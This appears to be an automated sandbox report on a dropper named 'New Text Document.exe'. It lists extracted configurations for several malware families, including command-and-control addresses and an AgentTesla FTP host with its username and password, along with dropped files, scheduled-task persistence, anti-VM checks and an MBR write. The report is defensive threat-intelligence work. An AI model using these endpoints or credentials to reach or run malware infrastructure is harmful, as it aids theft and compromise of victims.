Resubmissions
09-04-2024 13:27
240409-qqa5hsbd5t 1009-04-2024 13:27
240409-qp978abd5s 1009-04-2024 13:27
240409-qp9lpabd4y 1009-04-2024 13:27
240409-qp9axsgb32 1018-11-2023 14:44
231118-r4d9rsef94 10Analysis
-
max time kernel
299s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09-04-2024 13:27
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
New Text Document.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
New Text Document.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
New Text Document.exe
Resource
win11-20240221-en
General
-
Target
New Text Document.exe
-
Size
4KB
-
MD5
a239a27c2169af388d4f5be6b52f272c
-
SHA1
0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
-
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
-
SHA512
f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
-
SSDEEP
48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted
redline
6077866846
https://pastebin.com/raw/KE5Mft0T
Extracted
xworm
94.156.8.213:58002
127.0.0.1:18356
t-brave.gl.at.ply.gg:18356
-
Install_directory
%Public%
-
install_file
svchost.exe
Extracted
stealc
http://52.143.157.84
-
url_path
/c73eed764cc59dcb.php
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.siscop.com.co - Port:
21 - Username:
[email protected] - Password:
+5s48Ia2&-(t
Extracted
redline
50502
2.58.56.216:38382
Extracted
redline
@OLEH_PSP
185.172.128.33:8970
Extracted
asyncrat
0.5.7B
Default
194.147.140.157:3361
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
msdtc.exe
-
install_folder
%AppData%
Extracted
socks5systemz
http://bgiduqz.com/search/?q=67e28dd8655bf57a4609f84c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa48e8889b5e4fa9281ae978ff71ea771795af8e05c645db22f31dfe339426fa11a366c350adb719a9577e55b8603e983a608ffd17c6e690983f
http://bgiduqz.com/search/?q=67e28dd8655bf57a4609f84c7c27d78406abdd88be4b12eab517aa5c96bd86e896824a885a8bbc896c58e713bc90c91d36b5281fc235a925ed3e5cd6bd974a95129070b616e96cc92be510b866db52bee348ee4c2b14a82966836f23d7f210c7ee979c3dc46a9412
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
DcRat 60 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 2832 schtasks.exe 6092 schtasks.exe 288 schtasks.exe 5616 schtasks.exe 1428 schtasks.exe 5948 schtasks.exe 6140 schtasks.exe 6140 schtasks.exe 5236 schtasks.exe 5224 schtasks.exe 5284 schtasks.exe 5984 schtasks.exe 5980 schtasks.exe 4596 schtasks.exe 944 schtasks.exe 7080 schtasks.exe 5592 schtasks.exe 5376 schtasks.exe 5328 schtasks.exe 500 schtasks.exe 5740 schtasks.exe 7064 schtasks.exe 4012 schtasks.exe 2136 schtasks.exe 1076 schtasks.exe 6048 schtasks.exe 5124 schtasks.exe 5728 schtasks.exe 5788 schtasks.exe 5580 schtasks.exe 5552 schtasks.exe 1388 schtasks.exe 3868 schtasks.exe 1272 schtasks.exe 912 schtasks.exe 4176 schtasks.exe 2200 schtasks.exe 2104 schtasks.exe 4892 schtasks.exe 1496 schtasks.exe 516 schtasks.exe 1740 schtasks.exe 1624 schtasks.exe 5944 schtasks.exe 4112 schtasks.exe 3772 schtasks.exe 628 schtasks.exe 5500 schtasks.exe 5608 schtasks.exe 6016 schtasks.exe 2460 schtasks.exe 4968 schtasks.exe 5728 schtasks.exe 1304 schtasks.exe 2300 schtasks.exe 3332 schtasks.exe Key created \REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root New Text Document.exe 5956 schtasks.exe 4028 schtasks.exe 5408 schtasks.exe -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral2/files/0x000700000001ac33-141.dat family_xworm behavioral2/memory/2496-143-0x0000000000390000-0x00000000003A6000-memory.dmp family_xworm behavioral2/files/0x0004000000015275-254.dat family_xworm behavioral2/files/0x000900000001adf0-3803.dat family_xworm -
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral2/files/0x000800000001ac4d-686.dat family_zgrat_v1 -
Gh0st RAT payload 2 IoCs
resource yara_rule behavioral2/memory/6024-857-0x0000000010000000-0x0000000010362000-memory.dmp family_gh0strat behavioral2/memory/6024-859-0x0000000010000000-0x0000000010362000-memory.dmp family_gh0strat -
Process spawned unexpected child process 45 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 516 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1740 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2104 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4028 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5580 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5608 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2300 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6092 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 944 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5376 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 912 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5980 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1388 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4176 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1496 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5328 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4968 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2136 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6140 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1428 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1624 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 500 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6048 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4112 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5236 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5788 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5948 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4892 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4012 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5124 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5224 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6016 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1304 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2460 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5552 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5956 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5592 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5728 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2832 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1272 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1076 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2200 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5284 2384 schtasks.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5408 2384 schtasks.exe 81 -
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x000800000001acab-2256.dat family_quasar behavioral2/files/0x000700000001adff-3897.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral2/memory/3440-38-0x00000000010D0000-0x00000000010F2000-memory.dmp family_redline behavioral2/memory/1688-598-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral2/files/0x000700000001ac5b-716.dat family_redline behavioral2/files/0x000700000001ac5c-715.dat family_redline -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
resource yara_rule behavioral2/files/0x000700000001acb2-2293.dat dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mQxBvlTA.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 151 1428 u3x4.0.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mQxBvlTA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mQxBvlTA.exe -
Executes dropped EXE 64 IoCs
pid Process 4888 mQxBvlTA.exe 4280 xIPJVPDq.exe 1688 cBFZyhpY.exe 3440 crypted6077866846MVYQY.exe 4828 i1gcbW1E.exe 3876 wininit.exe 4496 1234.exe 4612 ISetup8.exe 1428 test2.exe 1420 1111.exe 1908 ISetup2.exe 4324 Tester.exe 2496 svchost.exe 3020 u3k4.0.exe 2544 555.exe 4816 Document.exe 2728 BrawlB0t.exe 872 medcallaboratory5.exe 1072 securitycheck.exe 4228 svchost.exe 3008 PrintSpoofer.exe 1000 Adobe_update.exe 4596 KKKKEHJKFC.exe 4280 Retailer_prog.exe 4256 BroomSetup.exe 196 alexxxxxxxx.exe 816 syncUpd.exe 1184 Traffic.exe 1192 propro.exe 4004 Ledger-Live.exe 5164 1111.exe 5356 new1.exe 5440 Document.exe 5460 Document.exe 5536 swiiii.exe 5752 ISetup5.exe 6024 mstsc.exe 2400 crypted_097f1784.exe 5044 Jufrxnb.exe 5068 june.exe 5872 june.tmp 1856 Jufrxnb.exe 4596 sunvox32.exe 6052 u4fs.0.exe 5440 crypted_33cb9091.exe 5824 sunvox32.exe 4740 Jufrxnb.exe 3772 u4fs.1.exe 5316 OneDrive.exe 5796 msdtc.exe 1116 new.exe 5756 ttt01.exe 5236 msdtc.exe 5456 msdtc.exe 5260 123p.exe 5892 IjerkOff.exe 5080 ISetup1.exe 4496 diufhloadme.exe 1428 u3x4.0.exe 4544 u3x4.1.exe 1556 ghhjhjhsg.exe 2152 gfhgfgjgf.exe 5600 agentDllDhcp.exe 4848 OneDrive.exe -
Loads dropped DLL 7 IoCs
pid Process 3020 u3k4.0.exe 3020 u3k4.0.exe 5872 june.tmp 5872 june.tmp 5872 june.tmp 5852 RegAsm.exe 5852 RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000800000001ac1d-7.dat themida behavioral2/memory/4888-29-0x0000000000FA0000-0x00000000020BC000-memory.dmp themida behavioral2/memory/4888-30-0x0000000000FA0000-0x00000000020BC000-memory.dmp themida behavioral2/files/0x000700000001ae89-7154.dat themida -
resource yara_rule behavioral2/memory/6024-851-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/6024-857-0x0000000010000000-0x0000000010362000-memory.dmp upx behavioral2/memory/6024-859-0x0000000010000000-0x0000000010362000-memory.dmp upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 45.155.250.90 -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mQxBvlTA.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: Jufrxnb.exe File opened (read-only) \??\X: Jufrxnb.exe File opened (read-only) \??\L: Jufrxnb.exe File opened (read-only) \??\M: Jufrxnb.exe File opened (read-only) \??\P: Jufrxnb.exe File opened (read-only) \??\S: Jufrxnb.exe File opened (read-only) \??\E: Jufrxnb.exe File opened (read-only) \??\G: Jufrxnb.exe File opened (read-only) \??\J: Jufrxnb.exe File opened (read-only) \??\K: Jufrxnb.exe File opened (read-only) \??\T: Jufrxnb.exe File opened (read-only) \??\V: Jufrxnb.exe File opened (read-only) \??\Z: Jufrxnb.exe File opened (read-only) \??\H: Jufrxnb.exe File opened (read-only) \??\I: Jufrxnb.exe File opened (read-only) \??\R: Jufrxnb.exe File opened (read-only) \??\W: Jufrxnb.exe File opened (read-only) \??\Y: Jufrxnb.exe File opened (read-only) \??\N: Jufrxnb.exe File opened (read-only) \??\O: Jufrxnb.exe File opened (read-only) \??\Q: Jufrxnb.exe File opened (read-only) \??\U: Jufrxnb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 505 pastebin.com 506 pastebin.com 9 raw.githubusercontent.com 10 raw.githubusercontent.com 15 pastebin.com 16 pastebin.com 309 pastebin.com -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 60 ip-api.com 473 api.myip.com 474 api.myip.com 475 ipinfo.io 476 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 ttt01.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000700000001ac22-64.dat autoit_exe behavioral2/files/0x000a00000001abf3-322.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4888 mQxBvlTA.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 872 set thread context of 5064 872 medcallaboratory5.exe 106 PID 1000 set thread context of 1688 1000 Adobe_update.exe 121 PID 196 set thread context of 4520 196 alexxxxxxxx.exe 139 PID 4816 set thread context of 5460 4816 Document.exe 160 PID 5536 set thread context of 5852 5536 swiiii.exe 165 PID 2400 set thread context of 6004 2400 crypted_097f1784.exe 178 PID 5440 set thread context of 5584 5440 crypted_33cb9091.exe 187 PID 1116 set thread context of 5624 1116 new.exe 204 PID 5796 set thread context of 5456 5796 msdtc.exe 222 PID 4496 set thread context of 360 4496 diufhloadme.exe 229 PID 4492 set thread context of 4820 4492 grhgjhjh.exe 301 -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\121e5b5079f7c0 agentDllDhcp.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\ttt01.exe agentDllDhcp.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\a5da42e1948546 agentDllDhcp.exe File opened for modification C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe mstsc.exe File created C:\Program Files\Microsoft Office 15\ClientX64\05bb6763ea52ce agentDllDhcp.exe File created C:\Program Files\Windows Portable Devices\46e11464d2e501 agentDllDhcp.exe File created C:\Program Files (x86)\Adobe\sysmon.exe agentDllDhcp.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\agentDllDhcp.exe agentDllDhcp.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fb4ee809d938d6 agentDllDhcp.exe File created C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe mstsc.exe File created C:\Program Files\Microsoft Office 15\ClientX64\new1.exe agentDllDhcp.exe File created C:\Program Files\Windows Portable Devices\Jufrxnb.exe agentDllDhcp.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Performance\WinSAT\DataStore\WmiPrvSE.exe agentDllDhcp.exe File created C:\Windows\Performance\WinSAT\DataStore\24dbde2999530e agentDllDhcp.exe File created C:\Windows\rescache\_merged\Idle.exe agentDllDhcp.exe File created C:\Windows\svchost.exe Tester.exe File opened for modification C:\Windows\svchost.exe Tester.exe File created C:\Windows\ModemLogs\Jufrxnb.exe agentDllDhcp.exe File created C:\Windows\ModemLogs\46e11464d2e501 agentDllDhcp.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5564 sc.exe 5888 sc.exe 3012 sc.exe 2844 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 3724 1000 WerFault.exe 119 5424 5164 WerFault.exe 155 5320 2400 WerFault.exe 167 6024 5440 WerFault.exe 183 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u4fs.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u4fs.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3x4.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3x4.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3x4.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u4fs.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BroomSetup.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u3k4.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u3k4.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Jufrxnb.exe -
Creates scheduled task(s) 1 TTPs 59 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7064 schtasks.exe 5984 schtasks.exe 5740 schtasks.exe 2832 schtasks.exe 3868 schtasks.exe 5948 schtasks.exe 1304 schtasks.exe 628 schtasks.exe 4028 schtasks.exe 5980 schtasks.exe 5552 schtasks.exe 5728 schtasks.exe 2200 schtasks.exe 6140 schtasks.exe 5944 schtasks.exe 6092 schtasks.exe 2136 schtasks.exe 500 schtasks.exe 3772 schtasks.exe 5592 schtasks.exe 1272 schtasks.exe 5956 schtasks.exe 5728 schtasks.exe 4892 schtasks.exe 4012 schtasks.exe 5408 schtasks.exe 2460 schtasks.exe 1740 schtasks.exe 5328 schtasks.exe 4968 schtasks.exe 6140 schtasks.exe 4176 schtasks.exe 3332 schtasks.exe 5284 schtasks.exe 2104 schtasks.exe 5788 schtasks.exe 288 schtasks.exe 2300 schtasks.exe 1388 schtasks.exe 4112 schtasks.exe 5236 schtasks.exe 5500 schtasks.exe 4596 schtasks.exe 5608 schtasks.exe 5376 schtasks.exe 1496 schtasks.exe 516 schtasks.exe 1624 schtasks.exe 5124 schtasks.exe 7080 schtasks.exe 5616 schtasks.exe 5580 schtasks.exe 1428 schtasks.exe 944 schtasks.exe 6048 schtasks.exe 912 schtasks.exe 5224 schtasks.exe 6016 schtasks.exe 1076 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 64 timeout.exe 6040 timeout.exe 5116 timeout.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7" Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft Jufrxnb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie Jufrxnb.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings IjerkOff.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings agentDllDhcp.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4636 PING.EXE 5140 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4280 xIPJVPDq.exe 4280 xIPJVPDq.exe 4280 xIPJVPDq.exe 4280 xIPJVPDq.exe 1688 cBFZyhpY.exe 1688 cBFZyhpY.exe 1688 cBFZyhpY.exe 1688 cBFZyhpY.exe 3440 crypted6077866846MVYQY.exe 3440 crypted6077866846MVYQY.exe 3440 crypted6077866846MVYQY.exe 3440 crypted6077866846MVYQY.exe 3440 crypted6077866846MVYQY.exe 3440 crypted6077866846MVYQY.exe 3440 crypted6077866846MVYQY.exe 3440 crypted6077866846MVYQY.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 4324 Tester.exe 3020 u3k4.0.exe 3020 u3k4.0.exe 752 powershell.exe 752 powershell.exe 752 powershell.exe 752 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 2496 svchost.exe 2496 svchost.exe 5064 RegSvcs.exe 5064 RegSvcs.exe 5064 RegSvcs.exe 1072 securitycheck.exe 512 powershell.exe 512 powershell.exe 512 powershell.exe 512 powershell.exe 1416 powershell.exe 1416 powershell.exe 1416 powershell.exe 1416 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4116 powershell.exe 4420 powershell.exe 4420 powershell.exe 4420 powershell.exe 4420 powershell.exe 4228 svchost.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 872 medcallaboratory5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2648 New Text Document.exe Token: SeDebugPrivilege 4280 xIPJVPDq.exe Token: SeDebugPrivilege 1688 cBFZyhpY.exe Token: SeDebugPrivilege 3440 crypted6077866846MVYQY.exe Token: SeDebugPrivilege 4888 mQxBvlTA.exe Token: SeDebugPrivilege 4324 Tester.exe Token: SeDebugPrivilege 2496 svchost.exe Token: SeBackupPrivilege 4724 vssvc.exe Token: SeRestorePrivilege 4724 vssvc.exe Token: SeAuditPrivilege 4724 vssvc.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeIncreaseQuotaPrivilege 752 powershell.exe Token: SeSecurityPrivilege 752 powershell.exe Token: SeTakeOwnershipPrivilege 752 powershell.exe Token: SeLoadDriverPrivilege 752 powershell.exe Token: SeSystemProfilePrivilege 752 powershell.exe Token: SeSystemtimePrivilege 752 powershell.exe Token: SeProfSingleProcessPrivilege 752 powershell.exe Token: SeIncBasePriorityPrivilege 752 powershell.exe Token: SeCreatePagefilePrivilege 752 powershell.exe Token: SeBackupPrivilege 752 powershell.exe Token: SeRestorePrivilege 752 powershell.exe Token: SeShutdownPrivilege 752 powershell.exe Token: SeDebugPrivilege 752 powershell.exe Token: SeSystemEnvironmentPrivilege 752 powershell.exe Token: SeRemoteShutdownPrivilege 752 powershell.exe Token: SeUndockPrivilege 752 powershell.exe Token: SeManageVolumePrivilege 752 powershell.exe Token: 33 752 powershell.exe Token: 34 752 powershell.exe Token: 35 752 powershell.exe Token: 36 752 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 2728 BrawlB0t.exe Token: SeIncreaseQuotaPrivilege 1292 powershell.exe 